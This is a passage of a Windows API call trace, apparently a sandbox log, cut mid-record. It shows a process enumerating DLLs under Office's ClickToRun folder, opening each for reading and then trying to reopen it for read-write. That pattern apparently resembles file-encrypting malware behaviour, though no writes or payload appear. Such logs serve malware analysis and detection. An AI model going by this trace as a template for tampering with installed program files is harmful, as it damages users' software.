HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0096.095] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.095] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.095] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80bfccf1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80bfccf1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb7179d00, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x307ac0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="mso40uires.dll", cAlternateFileName="MSO40U~1.DLL")) returned 1 [0096.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0096.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0096.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0096.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0096.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0096.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0096.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0096.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0096.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0096.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0096.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0096.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0096.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0096.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0096.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0096.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c458 [0096.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0096.095] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.095] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.095] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.095] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c458 | out: hHeap=0x20000) returned 1 [0096.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.095] AreFileApisANSI () returned 1 [0096.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll", lpUsedDefaultChar=0x0) returned 73 [0096.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0096.096] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.096] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0096.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0096.096] AreFileApisANSI () returned 1 [0096.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0096.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85e40 [0096.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x85e40, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll") returned 73 [0096.096] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uires.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0096.096] GetFileType (hFile=0x418) returned 0x1 [0096.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85e40 | out: hHeap=0x20000) returned 1 [0096.096] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0096.096] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0096.097] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0096.097] CloseHandle (hObject=0x418) returned 1 [0096.097] AreFileApisANSI () returned 1 [0096.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0096.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x859e0 [0096.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x859e0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll") returned 73 [0096.097] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uires.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.097] GetLastError () returned 0x20 [0096.097] GetLastError () returned 0x20 [0096.097] SetLastError (dwErrCode=0x20) [0096.097] GetLastError () returned 0x20 [0096.097] SetLastError (dwErrCode=0x20) [0096.097] GetLastError () returned 0x20 [0096.097] SetLastError (dwErrCode=0x20) [0096.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x859e0 | out: hHeap=0x20000) returned 1 [0096.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0096.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0096.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0096.098] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.098] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.098] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80c22f4a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80c22f4a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x10cc9700, ftLastWriteTime.dwHighDateTime=0x1d0d7aa, nFileSizeHigh=0x0, nFileSizeLow=0x8e6060, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="mso40uiwin32client.dll", cAlternateFileName="MSO40U~2.DLL")) returned 1 [0096.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0096.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0096.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0096.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0096.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0096.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0096.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0096.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0096.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0096.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0096.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0096.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0096.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0096.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0096.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0096.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0096.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0096.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0096.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0096.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0096.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0096.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0096.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81bf8 [0096.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0096.098] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.098] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.098] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.098] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81bf8 | out: hHeap=0x20000) returned 1 [0096.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0096.098] AreFileApisANSI () returned 1 [0096.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll", lpUsedDefaultChar=0x0) returned 81 [0096.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0096.099] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.099] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0096.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0096.099] AreFileApisANSI () returned 1 [0096.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0096.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa2) returned 0x5ef58 [0096.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x5ef58, cchWideChar=81 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll") returned 81 [0096.099] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uiwin32client.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0096.099] GetFileType (hFile=0x418) returned 0x1 [0096.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ef58 | out: hHeap=0x20000) returned 1 [0096.099] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0096.099] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0096.100] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0096.100] CloseHandle (hObject=0x418) returned 1 [0096.100] AreFileApisANSI () returned 1 [0096.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0096.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa2) returned 0x5f428 [0096.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x5f428, cchWideChar=81 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll") returned 81 [0096.100] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uiwin32client.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.100] GetLastError () returned 0x20 [0096.100] GetLastError () returned 0x20 [0096.100] SetLastError (dwErrCode=0x20) [0096.100] GetLastError () returned 0x20 [0096.100] SetLastError (dwErrCode=0x20) [0096.100] GetLastError () returned 0x20 [0096.100] SetLastError (dwErrCode=0x20) [0096.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0096.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0096.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0096.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0096.101] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.101] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.101] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x808dbb6b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x808dbb6b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x11fdc400, ftLastWriteTime.dwHighDateTime=0x1d0d7aa, nFileSizeHigh=0x0, nFileSizeLow=0xee60, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="msointl30.en-us.dll", cAlternateFileName="MSOINT~1.DLL")) returned 1 [0096.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0096.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0096.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0096.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0096.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0096.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0096.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0096.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0096.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0096.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0096.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0096.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0096.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0096.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0096.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0096.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0096.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0096.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0096.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0096.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0096.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0096.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0096.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c5a8 [0096.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0096.101] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.101] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.101] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.101] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0096.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0096.102] AreFileApisANSI () returned 1 [0096.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll", lpUsedDefaultChar=0x0) returned 78 [0096.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0096.102] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.102] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0096.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0096.102] AreFileApisANSI () returned 1 [0096.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0096.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8ce30 [0096.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8ce30, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll") returned 78 [0096.102] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msointl30.en-us.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0096.102] GetFileType (hFile=0x418) returned 0x1 [0096.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ce30 | out: hHeap=0x20000) returned 1 [0096.102] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0096.103] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0096.103] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0096.405] CloseHandle (hObject=0x418) returned 1 [0096.405] AreFileApisANSI () returned 1 [0096.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0096.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8cf80 [0096.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8cf80, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll") returned 78 [0096.405] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msointl30.en-us.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0096.405] GetFileType (hFile=0x418) returned 0x1 [0096.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cf80 | out: hHeap=0x20000) returned 1 [0096.406] CloseHandle (hObject=0x418) returned 1 [0096.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.406] RtlAllocateHeap 